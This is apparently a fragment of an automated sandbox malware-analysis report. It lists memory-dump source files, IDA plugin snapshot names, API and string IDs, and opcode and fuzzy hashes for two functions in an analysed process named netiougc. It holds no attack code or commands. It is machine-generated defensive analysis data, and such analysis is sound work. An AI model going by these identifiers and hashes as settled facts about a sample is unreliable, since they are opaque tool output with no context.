                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-
                            • API String ID: 1302938615-2137968064
                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                            • Instruction ID: 9915eabfeaf1f8889741e1ddaf0f576e13acb6d6da5064f4440845a3b7378344
                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                            • Instruction Fuzzy Hash: A391A170E042369BDB24DF6DC8816BEBFB5AF44320F58461FE865A72C1D7369A40CB61
                            Function 039E9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$@
                            • API String ID: 0-1194432280
                            • Opcode ID: fe6ffe4f75c9329f8e54d67340e3e0a63a01d279132d92aacf1fe2477139dae3
                            • Instruction ID: 578b93b863316705b6a973a63454b491653b458d08b339c3025430d729e708c3
                            • Opcode Fuzzy Hash: fe6ffe4f75c9329f8e54d67340e3e0a63a01d279132d92aacf1fe2477139dae3
                            • Instruction Fuzzy Hash: B9812875D002699FDB21DB54CC44BEEB7B8AF48750F0445EAEA19B7280E7349E80CFA0